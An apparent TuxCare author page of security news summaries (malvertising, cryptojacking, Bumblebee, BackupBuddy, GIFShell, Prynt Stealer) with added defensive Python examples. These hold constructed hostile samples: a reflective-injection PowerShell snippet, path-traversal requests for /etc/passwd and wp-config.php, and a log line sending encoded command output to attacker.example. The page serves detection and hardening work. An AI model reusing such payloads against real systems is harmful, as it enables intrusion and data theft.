Obanla Opeyemi, Author at TuxCare

Microsoft’s Edge news feed exploited to advance tech support scams

Security researchers at Malwarebytes have uncovered an ongoing malvertising campaign that injects ads into Microsoft’s Edge News Feed, redirecting potential victims to websites that promote tech support scams.

The Malwarebytes Threat Intelligence team said the fraud operation had been running for at least two months and ranks among the largest campaigns it has tracked, judging by the volume of telemetry it generates.

Within a single day the attackers rotate through hundreds of ondigitalocean.app subdomains to host their scam pages, and the malicious ads injected into the Edge News Feed timeline point to more than a dozen domains.

The redirect flow that sends Edge users to the malicious sites begins by fingerprinting the visitor's browser, including settings such as the time zone, to decide whether the visitor is a worthwhile target; visitors who are not are sent to a decoy page.

To reach the scam landing pages, the threat actors use the Taboola ad network to load a Base64-encoded JavaScript that filters potential victims.

“The goal of this script is to only show the malicious redirection to potential victims, ignoring bots, VPNs and geolocations that are not of interest that are instead shown a harmless page related to the advert. This scheme is meant to trick innocent users with fake browser locker pages, very well known and used by tech support scammers,” explained Malwarebytes.

The sources for this piece include an article in BleepingComputer.

Hackers exploit Oracle WebLogic Servers and Docker APIs to mine Crypto

Cybersecurity company Trend Micro has uncovered a malware campaign in which threat actors exploit security vulnerabilities in the Oracle WebLogic Server to deliver cryptocurrency mining malware.

One of the malware families exploiting these vulnerabilities is Kinsing, whose operators are known for scanning for vulnerable servers and co-opting them into a botnet.

In the latest campaign, the attackers use CVE-2020-14882, a two-year-old remote code execution (RCE) vulnerability with a CVSS score of 9.8, against unpatched servers to take control of the server and drop malicious payloads.

Once the vulnerability is exploited, the attackers run a shell script that performs several actions, including deleting the /var/log/syslog system log, disabling security features and the cloud service agents of Alibaba and Tencent, and killing competing mining processes.

After it has been successfully deployed, the shell script downloads the Kinsing malware from a remote server and takes action to ensure persistence.

Researchers from Aqua Security also identified another cryptojacking group called TeamTNT.

One of TeamTNT's attack chains aims to solve the discrete logarithm problem on the secp256k1 elliptic curve; if it succeeded, the attackers could compute the private key of any cryptocurrency wallet on that curve. The campaign uses the hijacked computing power of its targets to run an ECDLP solver in the hope of obtaining such keys, a computation that is not feasible at any realistic scale.

Two other TeamTNT attacks involve the exploitation of exposed Redis servers and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.

According to the researchers, the Docker Hub accounts alpineos and sandeep078 are used to distribute a variety of malicious payloads, including rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners, and even the Kinsing malware.

As a mitigation, organizations are advised to protect any exposed Docker REST API with TLS to prevent adversary-in-the-middle (AiTM) attacks, and to use credential stores and credential helpers rather than keeping user credentials in plaintext configuration files.
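The following is an added example, not code from Trend Micro, Aqua Security or TuxCare, showing what the TLS recommendation above looks like in dockerd's daemon.json and a small audit that flags the weak form. The two configurations are constructed samples; the certificate paths and the management address 10.0.0.5 are assumptions for the example. The option names (hosts, tlsverify, tlscacert, tlscert, tlskey) are dockerd's documented daemon.json settings.

```python
"""Audit a dockerd daemon.json for a TCP API listener that lacks TLS."""
import json
from typing import List

# dockerd settings that must all be present for a TLS-protected TCP listener
REQUIRED_TLS_KEYS = ("tlsverify", "tlscacert", "tlscert", "tlskey")

# Constructed sample: the weak configuration that cryptojacking groups scan for
# (plaintext Docker API on 0.0.0.0:2375, no TLS at all).
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Constructed sample: the same daemon with mutual TLS enforced on the
# conventional TLS port 2376. The certificate paths and the management
# address are assumptions for the example.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""


def audit_docker_daemon(config_text: str) -> List[str]:
    """Return a list of findings; an empty list means no TCP exposure problem."""
    cfg = json.loads(config_text)
    findings: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix socket only: not reachable over the network

    for host in tcp_hosts:
        addr = host[len("tcp://"):]
        if addr.endswith(":2375"):
            findings.append(f"{host}: port 2375 is the conventional plaintext Docker port")
        if addr.startswith(("0.0.0.0", "[::]", ":")):
            findings.append(f"{host}: bound to all interfaces; restrict to a management address where possible")

    # tlsverify=false or an absent cert/key path both leave the listener unauthenticated
    missing = [k for k in REQUIRED_TLS_KEYS if not cfg.get(k)]
    if missing:
        findings.append("TCP listener is not protected by TLS (missing: " + ", ".join(missing) + ")")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_docker_daemon(text) or ["ok"])
```

Point the script at /etc/docker/daemon.json on each host; a listener started from systemd command-line flags rather than daemon.json will not be seen by it, so also check `ps` output for dockerd started with `-H tcp://`.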

The sources for this piece include an article in TheHackerNews.

U.S. Seizes $30 Million Worth of Crypto from North Korean Hackers

Chainalysis, a U.S. blockchain analytics company, said it worked with the FBI to recover more than $30 million in cryptocurrency stolen from the online video game Axie Infinity by the North Korea-linked Lazarus Group, marking the first time funds stolen by the group have been seized.

The amount recovered is only a fraction of the estimated $600 million that the FBI says North Korean hackers stole from the maker of the popular game, which lets players earn digital currency.

“The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains,” said Erin Plante, senior director of investigations at Chainalysis.

Plante, who leads the investigation at Chainalysis, said the seizure will not be the last, called it a significant development for law enforcement, and said investigators are working to seize the remaining loot.

According to Plante, Chainalysis took part in the seizures, using “advanced tracking techniques to track stolen funds to withdraw ATMs, and working with law enforcement and industry stakeholders to quickly freeze funds.”

The Lazarus Group obtained five of the nine private keys held by the transaction validators of Ronin Network's cross-chain bridge and used them to make two withdrawals: one of 173,600 Ether (ETH) and one of 25.5 million USDC. Chainalysis noted that the group has since laundered the funds through “over 12,000 different crypto addresses to date,” and that the stolen ETH was mixed in batches through the popular Tornado Cash mixing service.

The sources for this piece include an article in TheHackerNews.

Bumblebee Malware Offers a new Infection Chain

A new version of the Bumblebee malware loader has been discovered by researchers at Cyble. The new variant introduces a new infection chain, including the use of the PowerSploit framework for stealthy reflective injection of a DLL payload into memory.

Whereas earlier campaigns reached victims via emails carrying password-protected zipped ISO files, the new variant uses a VHD (Virtual Hard Disk) file instead of an ISO file. The VHD file contains a LNK shortcut file.

Instead of running the Bumblebee DLL directly, the LNK now executes “imageda.ps1,” which launches a PowerShell window and hides it from the user by abusing the ‘ShowWindow’ API. The PS1 script is obfuscated with Base64 and string concatenation to evade antivirus detection while it loads the second-stage PowerShell loader.

The second stage uses the same disguise tactics as the first and includes the PowerSploit module used to load the 64-bit malware into the memory of the PowerShell process through reflective injection.

“PowerSploit is an open source post-exploitation framework in which the malware uses a method, Invoke-ReflectivePEInjection, for reflectively loading the DLL into the PowerShell Process. This method validates the embedded file and performs multiple checks to ensure that the file is loaded properly on the executing system,” Cyble explains in the report.

The new infection chain lets Bumblebee load from memory without ever touching the disk, which minimizes the chance of being detected and stopped by antivirus tools. The added stealth makes the loader a stronger initial access tool and increases its appeal to ransomware and malware operators.
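An analyst triaging a chain like this has to peel off exactly the two layers described above, Base64 and string concatenation, before any string match for PowerSploit names will fire. The following is an added example, not code from Cyble or from the Bumblebee sample, that does that. It assumes the Base64 layer is PowerShell's -EncodedCommand form (Base64 of the UTF-16LE script text); the script text itself is a constructed sample in the style the article describes, not the real imageda.ps1.

```python
"""Decode a PowerShell -EncodedCommand blob, undo string concatenation, and
look for the loader indicators named in the Bumblebee write-up."""
import base64
import re
from typing import List

# Indicators drawn from the infection chain described above.
INDICATORS = (
    "Invoke-ReflectivePEInjection",  # PowerSploit reflective DLL loader
    "ShowWindow",                    # used to hide the PowerShell console
    "FromBase64String",              # second stage decoded in memory
)

# 'abc' + 'def' (either quote style) -> 'abcdef'
_CONCAT = re.compile(r"""(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3""")


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries the script as Base64 of its UTF-16LE bytes."""
    return base64.b64decode(blob).decode("utf-16-le")


def collapse_concatenation(script: str) -> str:
    """Join adjacent string literals until no 'a' + 'b' pairs remain."""
    previous = None
    while previous != script:
        previous = script
        script = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", script)
    return script


def find_indicators(script: str) -> List[str]:
    """Case-insensitive substring match, since PowerShell names are case-insensitive."""
    lowered = script.lower()
    return [name for name in INDICATORS if name.lower() in lowered]


def analyze_encoded_command(blob: str) -> List[str]:
    """Full pipeline: decode, deobfuscate, then match indicators."""
    return find_indicators(collapse_concatenation(decode_encoded_command(blob)))


def encode_for_powershell(script: str) -> str:
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample (not the real imageda.ps1): the sensitive names are split
# across concatenated literals so a plain substring scan misses them.
SAMPLE_SCRIPT = (
    "$fn = 'Invoke-Reflect' + 'ivePEIn' + 'jection'; "
    "$api = \"Show\" + \"Window\"; "
    "$stage2 = [System.Convert]::FromBase64String($blob); "
    "& $fn -PEBytes $stage2"
)
SAMPLE_ENCODED = encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(collapse_concatenation(decode_encoded_command(SAMPLE_ENCODED)))
    print(analyze_encoded_command(SAMPLE_ENCODED))
```

Before the concatenation pass only FromBase64String is visible; after it all three names appear, which is why a scanner that stops at the Base64 layer reports the script as clean. Real samples add further layers (format operators, character-code arrays), so treat this as the first two passes of a deobfuscation loop rather than a complete one.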

The sources for this piece include an article in BleepingComputer.

Hackers Actively Exploit WordPress Zero-day Flaw

Wordfence, a WordPress security company, has warned of a zero-day WordPress vulnerability that is now being exploited by attackers.

The bug is in a WordPress plugin called BackupBuddy. BackupBuddy is a plugin that allows users to back up their entire WordPress installation from within the dashboard, including theme files, pages, posts, widgets, users, and media files.

According to Wordfence, the vulnerability stems from the Local Directory Copy feature, which is designed to store a local copy of backups. An insecure implementation of this feature lets attackers download arbitrary files from the server.

“This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information,” Wordfence said.

The bug is tracked as CVE-2022-31474 and carries a CVSS severity score of 7.5. It affects versions 8.5.8.0 through 8.7.4.1 and was fixed in version 8.7.5, released on September 2, 2022.

Wordfence said active exploitation of CVE-2022-31474 began on August 26, 2022. Since then, the firm has blocked nearly five million attacks, most of which attempted to read files such as /etc/passwd, /wp-config.php, .my.cnf, and .accesshash.

Technical details of the vulnerability were withheld to prevent further exploitation.

“This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation. This could include the WordPress wp-config.php file and, depending on your server setup, sensitive files like /etc/passwd,” said the plugin’s developer, iThemes.

BackupBuddy users are advised to upgrade to the latest version to fix the bug and prevent their sites from being compromised. Sites that have already been hit should reset the database password, change the WordPress salts, and rotate any API keys stored in wp-config.php, since an attacker who read that file holds all of them.
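Wordfence withheld the plugin's code, so the following is a general added example, not BackupBuddy's code or its fix, of the containment check that an arbitrary-file-download bug of this class lacks. It is written in Python for illustration (the PHP equivalent is realpath() on the joined path followed by the same prefix comparison). The backup directory, file names and the .zip-only rule are assumptions for the example; the traversal requests mirror the files the article says attackers went after.

```python
"""Serve files only from inside a backup directory: the check an
arbitrary-file-download bug is missing."""
import os
import tempfile
from typing import Optional

ALLOWED_SUFFIXES = (".zip",)  # assumption for the example: backups are zip archives


def resolve_download_path(backup_dir: str, requested: str) -> Optional[str]:
    """Return the real path of the requested backup, or None if it must be refused."""
    if "\x00" in requested:
        return None  # a null byte can truncate the path in C-backed file APIs
    base = os.path.realpath(backup_dir)
    # join() discards `base` when `requested` is absolute ("/etc/passwd"), and
    # realpath() follows ".." and symlinks, so the comparison below is made on
    # the file that would actually be opened, not on the string the user sent.
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows
        inside = False
    if not inside:
        return None
    # Only hand out real backup archives; a bare "inside the directory" test
    # would still serve plugin source or stray config files placed there.
    if not candidate.endswith(ALLOWED_SUFFIXES) or not os.path.isfile(candidate):
        return None
    return candidate


def build_fixture() -> str:
    """Create a throwaway backup directory with one real archive and one symlink
    that escapes the directory (constructed test data)."""
    d = tempfile.mkdtemp(prefix="backups-")
    with open(os.path.join(d, "backup-2022-09-02.zip"), "wb") as f:
        f.write(b"PK\x05\x06" + b"\x00" * 18)  # minimal empty zip
    try:
        os.symlink("/etc/passwd", os.path.join(d, "escape.zip"))
    except OSError:
        pass  # symlinks unavailable here; the traversal cases below still apply
    return d


if __name__ == "__main__":
    d = build_fixture()
    for req in ("backup-2022-09-02.zip", "../../../etc/passwd", "/etc/passwd",
                "../wp-config.php", "escape.zip", "..\\..\\.my.cnf"):
        print(f"{req!r:32} -> {resolve_download_path(d, req)}")
```

The symlink case is the one most hand-rolled checks miss: a string-prefix test on the unresolved path passes "escape.zip", but the file it opens is /etc/passwd. Resolving first and comparing afterwards closes both the ".." and the symlink routes with one comparison.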

The sources for this piece include an article in TheHackerNews.

Attackers use Watering Hole Attacks to Install ScanBox Keylogger

A China-based threat actor tracked as TA423 is carrying out watering hole attacks on Australian organizations and offshore energy companies operating in the South China Sea to deliver the ScanBox reconnaissance framework to victims.

A watering hole attack targets a specific organization by planting malicious code on a website its members visit regularly, so that the computers used within the organization are infected.

To carry out the attack, the group uses ScanBox, a customizable, multifunctional JavaScript-based framework that adversaries use to perform reconnaissance.

The keylogger data ScanBox collects from the watering holes is part of a multi-stage operation that gives the attackers knowledge of potential targets for use in future attacks against those organizations.

To execute an attack, the attackers load the malicious JavaScript on a compromised website, where ScanBox acts as a keylogger, capturing everything the user types on the infected site.

TA423 launches its attacks with phishing emails pretending to be from an employee of the “Australian Morning News,” a fictitious organization.

Targets are invited to visit their “humble news website,” australianmorningnews[.]com. When a target clicks the link, they land on a site whose content is copied from real news websites, and the ScanBox framework is delivered to their browser.

ScanBox's initial script collects information about the target computer, including the operating system, language, and installed version of Adobe Flash. ScanBox also enumerates browser extensions, plugins, and components such as WebRTC.

The sources for this piece include an article in ThreatPost.

New ‘GIFShell’ Attack Technique Exploits Microsoft Teams GIFs

A new attack technique, dubbed ‘GIFShell’, chains together bugs and weaknesses in Microsoft Teams to abuse legitimate Microsoft infrastructure to deliver malicious files, execute commands, and exfiltrate data.

According to Bobby Rauch, the cybersecurity consultant and pentester who discovered the flaws, GIFShell lets attackers create a reverse shell that delivers malicious commands through base64-encoded GIFs in Teams, with the command output exfiltrated through GIFs retrieved by Microsoft's own infrastructure.

To establish the reverse shell, attackers must first convince the user to install a malicious stager that executes the commands and uploads their output via a GIF URL to a Microsoft Teams webhook.

The Teams weaknesses the technique relies on include a bypass of Teams security controls that allows external users to send attachments to Teams users.

The technique also tampers with sent attachments so that users download files from an external URL instead of the generated SharePoint link. It spoofs Teams attachments to appear as harmless files that in fact download a malicious executable or document, and it uses insecure URLs to enable SMB NTLM hash theft or NTLM relay attacks.

Microsoft Teams allows sending HTML-based base64-encoded GIFs but does not scan the byte content of those GIFs, so malicious commands can be delivered inside a normal-looking GIF. And because Teams stores messages in a parsable log file on the victim's machine, that file can be read by a low-privileged user.

Microsoft servers fetch GIFs from remote servers, which allows data exfiltration through the GIF file names.
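Because the exfiltration leg is an ordinary GIF fetch by Microsoft infrastructure, the defender's signal is the file name, not the source address. The following is an added example, not Rauch's tooling or Microsoft's code, of a detection pass over outbound image requests that flags GIF names which decode to text. It assumes the exfiltrated output is base64-encoded into the name (as the command channel described above is base64), and it uses a constructed log format and constructed sample lines.

```python
"""Flag GIF fetches whose file name is really an encoded payload, the
exfiltration channel GIFShell relies on."""
import base64
import binascii
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlparse

MIN_STEM_LENGTH = 24  # assumption: real GIF names are short; encoded output is not
_B64_ALPHABET = re.compile(r"[A-Za-z0-9+/_=-]+")


def decode_if_text(stem: str) -> Optional[str]:
    """Try base64url, then base64; return the payload if it decodes to printable text."""
    padded = stem + "=" * (-len(stem) % 4)  # senders usually strip '=' from names
    for decoder in (base64.urlsafe_b64decode, base64.b64decode):
        try:
            raw = decoder(padded)
        except (ValueError, binascii.Error):
            continue
        printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
        if raw and printable / len(raw) >= 0.9:
            return raw.decode("ascii", errors="replace")
    return None


def suspicious_gif_name(filename: str) -> Optional[str]:
    """Return the decoded payload for a GIF name that carries text, else None."""
    stem, _, ext = filename.rpartition(".")
    if ext.lower() != "gif" or len(stem) < MIN_STEM_LENGTH:
        return None
    if not _B64_ALPHABET.fullmatch(stem):
        return None  # spaces, dots, etc.: a human-readable name
    return decode_if_text(stem)


def suspicious_gif_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Constructed log format: '<time> <client> <method> <url> <status>'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        url = parts[3]
        name = unquote(urlparse(url).path.rsplit("/", 1)[-1])
        payload = suspicious_gif_name(name)
        if payload is not None:
            hits.append((url, payload))
    return hits


# Constructed sample: one fetch whose name is base64url of command output,
# surrounded by ordinary sticker and image requests.
EXFIL_NAME = (base64.urlsafe_b64encode(b"uid=1000(alice) gid=1000(alice)")
              .decode("ascii").rstrip("=") + ".gif")
SAMPLE_LOG = [
    "2022-09-09T10:00:01Z 10.1.2.3 GET https://media.example/stickers/happy-dance.gif 200",
    "2022-09-09T10:00:02Z 10.1.2.3 GET https://media.example/funny%20cat%20dancing%20reaction.gif 200",
    f"2022-09-09T10:00:03Z 10.1.2.3 GET https://attacker.example/{EXFIL_NAME} 200",
    "2022-09-09T10:00:04Z 10.1.2.3 GET https://media.example/cat.typing.on.keyboard.reaction.gif 200",
    "2022-09-09T10:00:05Z 10.1.2.3 GET https://media.example/logo.png 200",
]

if __name__ == "__main__":
    for url, payload in suspicious_gif_requests(SAMPLE_LOG):
        print(f"{url}\n  decodes to: {payload!r}")
```

The length and alphabet gates keep ordinary slugs out; the decode-to-printable test is what separates an encoded payload from a long but innocent name. Run it over the URLs your proxy or Teams egress logs record for image fetches, and treat a hit as a pivot to the host that sent the message, since the fetch itself comes from Microsoft's side.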

The sources for this piece include an article in BleepingComputer.

Prynt Stealer’s Backdoor Steals Data Stolen from Cyberattacks

A backdoor in the Prynt Stealer information stealer secretly forwards data exfiltrated by the malware's own operators to its author, according to Zscaler ThreatLabz researchers.

The malware sells for $100 for a one-month license and $900 for a lifetime subscription and gives its operators extensive capabilities, including logging keystrokes, stealing credentials from web browsers, and harvesting data from Discord and Telegram.

Prynt Stealer's code is derived from two open source malware families, AsyncRAT and StormKitty. The author's additions include the backdoor: a Telegram channel through which information stolen by other threat actors is secretly collected.

For data exfiltration, Prynt Stealer uses code copied from StormKitty with minor changes. The malware also includes an anti-analysis feature that continuously monitors the victim's process list for analysis tools such as taskmgr, netstat and wireshark.

As soon as one of these processes is detected, the malware blocks the Telegram command and control channels.

The researchers also identified two other variants written by the Prynt Stealer author: WorldWind and DarkEye.

DarkEye is an implant bundled with a free Prynt Stealer builder. The builder is designed to drop and execute a remote access trojan called Loda RAT, an AutoIT-based malware that can access and exfiltrate both system and user information. Loda RAT also acts as a keylogger, takes screenshots, starts and terminates processes, and downloads additional payloads over a connection to a C2 server.

“While this untrustworthy behavior is nothing new in the world of cybercrime, the victims’ data end up in the hands of multiple threat actors, increasing the risks of one or more large-scale attacks to follow. Note that there are cracked/leaked copies of Prynt Stealer with the same backdoor, which in turn will benefit the malware author even without direct compensation,” write Zscaler ThreatLabz researchers Atinderpal Singh and Brett Stone-Gross.

The sources for this piece include an article in TheHackerNews.

Google Releases Chrome Update to Fix New Zero-day Flaw

Google has released an emergency patch to fix a zero-day vulnerability exploited in the wild. Tracked as CVE-2022-3075, the zero-day flaw was discovered and reported on August 30, 2022 by an anonymous researcher.

The flaw is insufficient data validation in Mojo, a collection of runtime libraries that provides a platform-agnostic mechanism for inter-process communication (IPC).

Google said it “is aware of reports that an exploit for CVE-2022-3075 exists in the wild,” but, as is usual until most users have updated, did not share further details about the nature of the attacks.

Google asks users to upgrade to version 105.0.5195.102 for Windows, macOS, and Linux to mitigate the threat. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are advised to apply the fixes as soon as they become available.

The update brings to six the number of Chrome zero-days Google has patched since the start of the year. The other five are CVE-2022-0609, CVE-2022-1096, CVE-2022-1364, CVE-2022-2294, and CVE-2022-2856.

CVE-2022-0609 is a use-after-free vulnerability in the Animation component which, if successfully exploited, could lead to corruption of valid data and the execution of arbitrary code on affected systems.

CVE-2022-1096 is a type confusion vulnerability in the V8 JavaScript engine.

CVE-2022-1364 is similar to CVE-2022-1096, being another type confusion flaw in the V8 JavaScript engine.

CVE-2022-2294 is a heap overflow flaw in the WebRTC component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.

CVE-2022-2856 is a case of insufficient validation of untrusted input in Intents.

The sources for this piece include an article in TheHackerNews.

New Ransomware hits Chile’s Windows and Linux servers

A ransomware attack that began on Thursday, August 25, hit Windows and Linux systems operated by a Chilean government agency; the incident was confirmed by Chile's computer security incident response team (CSIRT).

According to the Chilean CSIRT, the attackers stopped all running virtual machines and encrypted their files, appending the “.crypt” extension. The agency said the malware can steal credentials from web browsers, enumerate removable devices for encryption, and evade antivirus detection by means of execution timeouts.

The incident is a double-extortion attack: the attackers gave the CSIRT a communication channel for negotiating a ransom, payment of which would supposedly stop the stolen files from being leaked and unlock the encrypted data.

The attackers set a three-day deadline and threatened to sell the stolen data to other cybercriminals on the dark web. The Chilean CSIRT did not name the group behind the attack, but the extension appended to the encrypted files points to the ‘RedAlert’ ransomware, which used the ‘.crypt’ extension in attacks on both Windows servers and Linux VMware ESXi machines.

In his analysis of the malware, Chilean threat analyst Germán Fernández said the strain appears to be entirely new and that the researchers he analyzed it with could not link it to any known family.

“One particular thing about the attack, is that the threat actors distributed the ransom note at a previous stage to the deployment of the ransomware as the final payload, possibly for evasion issues or to avoid having their contact details leaked when sharing the final sample,” Fernández said.

To protect against further attacks, Chile’s cybersecurity organization recommends a number of security measures to all government agencies and large private organizations. These include using a properly configured firewall and antivirus tool, updating VMware and Microsoft assets, securing key data, verifying the configuration of anti-spam filters, implementing network segmentation, and patching and mitigating new vulnerabilities.

The sources for this piece include an article in BleepingComputer.
